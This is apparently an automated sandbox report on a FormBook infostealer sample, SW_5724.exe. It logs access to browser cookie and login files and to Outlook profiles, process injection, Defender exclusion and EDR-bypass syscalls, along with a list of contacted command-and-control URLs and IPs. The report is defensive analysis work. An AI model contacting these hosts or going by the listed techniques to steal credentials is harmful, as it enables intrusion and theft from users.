                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.SW_5724.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.SW_5724.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.4517476095.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4514626352.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4515595244.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2430161361.0000000007360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4515540359.0000000003660000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2341900856.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.SW_5724.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.SW_5724.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.4517476095.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4514626352.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4515595244.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2430161361.0000000007360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4515540359.0000000003660000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2341900856.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		312
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567396 Sample: SW_5724.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 39 www.egyshare.xyz 2->39 41 www.egldfi.xyz 2->41 43 17 other IPs or domains 2->43 53 Suricata IDS alerts for network traffic 2->53 55 Antivirus detection for URL or domain 2->55 57 Multi AV Scanner detection for submitted file 2->57 61 6 other signatures 2->61 10 SW_5724.exe 4 2->10         started        signatures3 59 Performs DNS queries to domains with low reputation 41->59 process4 file5 37 C:\Users\user\AppData\...\SW_5724.exe.log, ASCII 10->37 dropped 65 Adds a directory exclusion to Windows Defender 10->65 14 SW_5724.exe 10->14         started        17 powershell.exe 23 10->17         started        19 SW_5724.exe 10->19         started        signatures6 process7 signatures8 75 Maps a DLL or memory area into another process 14->75 21 BmUrsTIvMw.exe 14->21 injected 77 Loading BitLocker PowerShell Module 17->77 24 WmiPrvSE.exe 17->24         started        26 conhost.exe 17->26         started        process9 signatures10 63 Found direct / indirect Syscall (likely to bypass EDR) 21->63 28 regini.exe 13 21->28         started        process11 signatures12 67 Tries to steal Mail credentials (via file / registry access) 28->67 69 Tries to harvest and steal browser information (history, passwords, etc) 28->69 71 Modifies the context of a thread in another process (thread injection) 28->71 73 3 other signatures 28->73 31 BmUrsTIvMw.exe 28->31 injected 35 firefox.exe 28->35         started        process13 dnsIp14 45 bloodbalancecaps.shop 108.179.253.197, 50024, 50025, 50026 UNIFIEDLAYER-AS-1US United States 31->45 47 samundri.online 84.32.84.32, 49871, 49877, 49883 NTT-LT-ASLT Lithuania 31->47 49 7 other IPs or domains 31->49 51 Found direct / indirect Syscall (likely to bypass EDR) 31->51 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SW_5724.exe42%ReversingLabsWin32.Trojan.Generic
                SW_5724.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.t19yd.top/sa1b/?fh=XYHJVoT0LuIOm26Tyq9N91avW6u0HKWTSvSmIrnltmLk6JYzFfgCVHRXJm9nnHtkqw/GQg9hdUic1chKWcYHIwgC/veVHbD1fWEHf5TqpC81TauCsO8XC98q6/wqQrn6ig==&jnGlY=dHeXwH1PkJZDr0%Avira URL Cloudsafe
                http://www.bloodbalancecaps.shop/qimy/0%Avira URL Cloudsafe
                http://www.egyshare.xyz/440l/0%Avira URL Cloudsafe
                http://www.appsolucao.shop/8mlm/100%Avira URL Cloudmalware
                http://www.atendefacil.info/gua3/?fh=PEExTvPebnfdN5xst02JMzGti5FnGkiLE22WiywfEIelsbdwqCVd6ByVLBEklw1lRQ+mhNbJQBi9PlJBFsZX42nwE1my8b04S6WdWKB/MDuWSU+6nbfM6wifiPOcueyLhQ==&jnGlY=dHeXwH1PkJZDr0%Avira URL Cloudsafe
                http://www.ana-silverco.shop/ez1t/0%Avira URL Cloudsafe
                http://www.happyjam.life/4ii9/?fh=DCK/bgCIPtpt2RJApr/S57a5c6dyUmc4/YRC2H7mEi+GV8MabGqvART7ZhzmedatEBHVT2HbXE2R9ehhzokwzGc74THGa4p/rcEpcgteY+NZBAve/cPV6mEezHweDFAvow==&jnGlY=dHeXwH1PkJZDr0%Avira URL Cloudsafe
                http://www.remedies.pro/8ewn/?fh=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblIvsB4LfBbF1oBXzvh2mLP4bfiHovBjqCi6jVggqxg==&jnGlY=dHeXwH1PkJZDr0%Avira URL Cloudsafe
                http://www.happyjam.life/4ii9/0%Avira URL Cloudsafe
                http://www.samundri.online/3ifu/?fh=u5oj/oWevlm54LOT1+Bryx675u+IDrtDZr257qJzt/2kXoBMan19x+0MdpxIfeL/WChZbD4JNYT/SNFPC81SuzkGtTD08CNBMN4l2lkk/418RVw+aNXyvs4RLuFyzfcvLA==&jnGlY=dHeXwH1PkJZDr0%Avira URL Cloudsafe
                http://www.sitioseguro.blog/k4tn/0%Avira URL Cloudsafe
                http://www.whisperart.net/27s6/0%Avira URL Cloudsafe
                http://www.bloodbalancecaps.shop/qimy/?fh=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq+51atMbfrB/quJS6koXR/q8qHQdflns0zhBJovgpw==&jnGlY=dHeXwH1PkJZDr0%Avira URL Cloudsafe
                http://www.bloodbalancecaps.shop0%Avira URL Cloudsafe
                http://www.appsolucao.shop/8mlm/?jnGlY=dHeXwH1PkJZDr&fh=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0VbuKcGIGxf8Na/XWMFk3HWS90xtCxfW9k4DFGjEgQ==100%Avira URL Cloudmalware
                http://www.sitioseguro.blog/k4tn/?fh=UszxsXnyXaHrix4mOaqJD7vMyBmxMOeCUNKfuMYEqjdUerJZ7q+fEOQwPEbVbpTJrGRa9GB6/NRWLuSsaWPLUhjS0B7YhLYlkSpf0LkSvuXOrVZCV81o0QxXj1FyFrGf5Q==&jnGlY=dHeXwH1PkJZDr0%Avira URL Cloudsafe
                http://www.ana-silverco.shop/ez1t/?fh=6fEYs/GnwtqWMztB9xFdTpyVwIgq4y66Lrjdt5EE8ztyQFcx1ZWnbcrnPkjaT/5aXxdNApMw2aINlctYTPbgIAplS6fcUEAY0yLCPgkUVbpQbsIDX53LfadnD8pal0m+9g==&jnGlY=dHeXwH1PkJZDr0%Avira URL Cloudsafe
                http://www.dating-apps-az-dn5.xyz/tskk/?fh=o5GB+IawIAU5T0thXdQTAhCz8F67YQPQT/nwZCkciWz+LkCAD5WzKPOp+WFYKDZnS0ikteADWtOd2j97JYt8nhoktnI+jDBp8l2kGV3Ckdt2Sxo97xdpdVJjZoS3MkxEfg==&jnGlY=dHeXwH1PkJZDr0%Avira URL Cloudsafe
                http://www.samundri.online/3ifu/0%Avira URL Cloudsafe
                http://bloodbalancecaps.shop/qimy/?fh=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je720%Avira URL Cloudsafe
                http://www.egyshare.xyz/440l/?fh=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5zmz57pelvxK6DYsSAIhb49b75Fyr268iC5rfP5+VA==&jnGlY=dHeXwH1PkJZDr0%Avira URL Cloudsafe
                http://www.atendefacil.info/gua3/0%Avira URL Cloudsafe
                http://www.whisperart.net/27s6/?jnGlY=dHeXwH1PkJZDr&fh=3HPpqXJ7+KzZdUbztAJQoIdlDoC5J9hYXz+VcheInCeAf0Mmt05i/k62iF4aOsJa+VYW+vyKTPXBSx5msm7TgI/vrMgSa7d6ydGcyUbb1sGAEKWqA4+Ev4Y2u0PwcF1BFA==0%Avira URL Cloudsafe
                http://www.dating-apps-az-dn5.xyz/tskk/0%Avira URL Cloudsafe
                http://www.t19yd.top/sa1b/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.remedies.pro
                		13.248.169.48
                		truetrue
                  		unknown
                  www.whisperart.net
                  		199.59.243.227
                  		truetrue
                    		unknown
                    www.ana-silverco.shop
                    		172.67.156.195
                    		truetrue
                      		unknown
                      appsolucao.shop
                      		84.32.84.32
                      		truetrue
                        		unknown
                        samundri.online
                        		84.32.84.32
                        		truetrue
                          		unknown
                          www.dating-apps-az-dn5.xyz
                          		199.59.243.227
                          		truetrue
                            		unknown
                            www.sitioseguro.blog
                            		104.21.15.100
                            		truetrue
                              		unknown
                              www.egyshare.xyz
                              		13.248.169.48
                              		truetrue
                                		unknown
                                www.happyjam.life
                                		209.74.77.107
                                		truetrue
                                  		unknown
                                  bloodbalancecaps.shop
                                  		108.179.253.197
                                  		truetrue
                                    		unknown
                                    t19yd.top
                                    		38.47.207.164
                                    		truetrue
                                      		unknown
                                      www.atendefacil.info
                                      		208.115.225.220
                                      		truetrue
                                        		unknown
                                        www.bloodbalancecaps.shop
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.samundri.online
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.egldfi.xyz
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.t19yd.top
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.uynline.shop
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.betmatchx.online
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.appsolucao.shop
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.egyshare.xyz/440l/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.samundri.online/3ifu/?fh=u5oj/oWevlm54LOT1+Bryx675u+IDrtDZr257qJzt/2kXoBMan19x+0MdpxIfeL/WChZbD4JNYT/SNFPC81SuzkGtTD08CNBMN4l2lkk/418RVw+aNXyvs4RLuFyzfcvLA==&jnGlY=dHeXwH1PkJZDrtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.atendefacil.info/gua3/?fh=PEExTvPebnfdN5xst02JMzGti5FnGkiLE22WiywfEIelsbdwqCVd6ByVLBEklw1lRQ+mhNbJQBi9PlJBFsZX42nwE1my8b04S6WdWKB/MDuWSU+6nbfM6wifiPOcueyLhQ==&jnGlY=dHeXwH1PkJZDrtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.t19yd.top/sa1b/?fh=XYHJVoT0LuIOm26Tyq9N91avW6u0HKWTSvSmIrnltmLk6JYzFfgCVHRXJm9nnHtkqw/GQg9hdUic1chKWcYHIwgC/veVHbD1fWEHf5TqpC81TauCsO8XC98q6/wqQrn6ig==&jnGlY=dHeXwH1PkJZDrtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.happyjam.life/4ii9/?fh=DCK/bgCIPtpt2RJApr/S57a5c6dyUmc4/YRC2H7mEi+GV8MabGqvART7ZhzmedatEBHVT2HbXE2R9ehhzokwzGc74THGa4p/rcEpcgteY+NZBAve/cPV6mEezHweDFAvow==&jnGlY=dHeXwH1PkJZDrtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.appsolucao.shop/8mlm/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.ana-silverco.shop/ez1t/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bloodbalancecaps.shop/qimy/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.happyjam.life/4ii9/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.remedies.pro/8ewn/?fh=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblIvsB4LfBbF1oBXzvh2mLP4bfiHovBjqCi6jVggqxg==&jnGlY=dHeXwH1PkJZDrtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bloodbalancecaps.shop/qimy/?fh=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq+51atMbfrB/quJS6koXR/q8qHQdflns0zhBJovgpw==&jnGlY=dHeXwH1PkJZDrtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.sitioseguro.blog/k4tn/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.whisperart.net/27s6/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.appsolucao.shop/8mlm/?jnGlY=dHeXwH1PkJZDr&fh=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0VbuKcGIGxf8Na/XWMFk3HWS90xtCxfW9k4DFGjEgQ==true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.sitioseguro.blog/k4tn/?fh=UszxsXnyXaHrix4mOaqJD7vMyBmxMOeCUNKfuMYEqjdUerJZ7q+fEOQwPEbVbpTJrGRa9GB6/NRWLuSsaWPLUhjS0B7YhLYlkSpf0LkSvuXOrVZCV81o0QxXj1FyFrGf5Q==&jnGlY=dHeXwH1PkJZDrtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.dating-apps-az-dn5.xyz/tskk/?fh=o5GB+IawIAU5T0thXdQTAhCz8F67YQPQT/nwZCkciWz+LkCAD5WzKPOp+WFYKDZnS0ikteADWtOd2j97JYt8nhoktnI+jDBp8l2kGV3Ckdt2Sxo97xdpdVJjZoS3MkxEfg==&jnGlY=dHeXwH1PkJZDrtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ana-silverco.shop/ez1t/?fh=6fEYs/GnwtqWMztB9xFdTpyVwIgq4y66Lrjdt5EE8ztyQFcx1ZWnbcrnPkjaT/5aXxdNApMw2aINlctYTPbgIAplS6fcUEAY0yLCPgkUVbpQbsIDX53LfadnD8pal0m+9g==&jnGlY=dHeXwH1PkJZDrtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.samundri.online/3ifu/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.atendefacil.info/gua3/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.egyshare.xyz/440l/?fh=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5zmz57pelvxK6DYsSAIhb49b75Fyr268iC5rfP5+VA==&jnGlY=dHeXwH1PkJZDrtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.whisperart.net/27s6/?jnGlY=dHeXwH1PkJZDr&fh=3HPpqXJ7+KzZdUbztAJQoIdlDoC5J9hYXz+VcheInCeAf0Mmt05i/k62iF4aOsJa+VYW+vyKTPXBSx5msm7TgI/vrMgSa7d6ydGcyUbb1sGAEKWqA4+Ev4Y2u0PwcF1BFA==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.t19yd.top/sa1b/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.dating-apps-az-dn5.xyz/tskk/true
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabregini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoregini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://kb.fastpanel.direct/troubleshoot/regini.exe, 0000000A.00000002.4516139537.0000000004708000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 0000000A.00000002.4518077946.0000000005BF0000.00000004.00000800.00020000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515732704.0000000003FE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.google.comregini.exe, 0000000A.00000002.4516139537.0000000004A2C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 0000000A.00000002.4518077946.0000000005BF0000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4516139537.000000000489A000.00000004.10000000.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515732704.000000000430C000.00000004.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515732704.000000000417A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchregini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://localhost/arkanoid_server/requests.phpSW_5724.exe, 00000000.00000002.2082673604.00000000029D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.bloodbalancecaps.shopBmUrsTIvMw.exe, 0000000B.00000002.4517476095.00000000050E4000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://bloodbalancecaps.shop/qimy/?fh=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72regini.exe, 0000000A.00000002.4516139537.0000000004D50000.00000004.10000000.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515732704.0000000004630000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSW_5724.exe, 00000000.00000002.2082673604.0000000002D9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                104.21.15.100
                                                                                		www.sitioseguro.blogUnited States
                                                                                		13335CLOUDFLARENETUStrue
                                                                                13.248.169.48
                                                                                		www.remedies.proUnited States
                                                                                		16509AMAZON-02UStrue
                                                                                209.74.77.107
                                                                                		www.happyjam.lifeUnited States
                                                                                		31744MULTIBAND-NEWHOPEUStrue
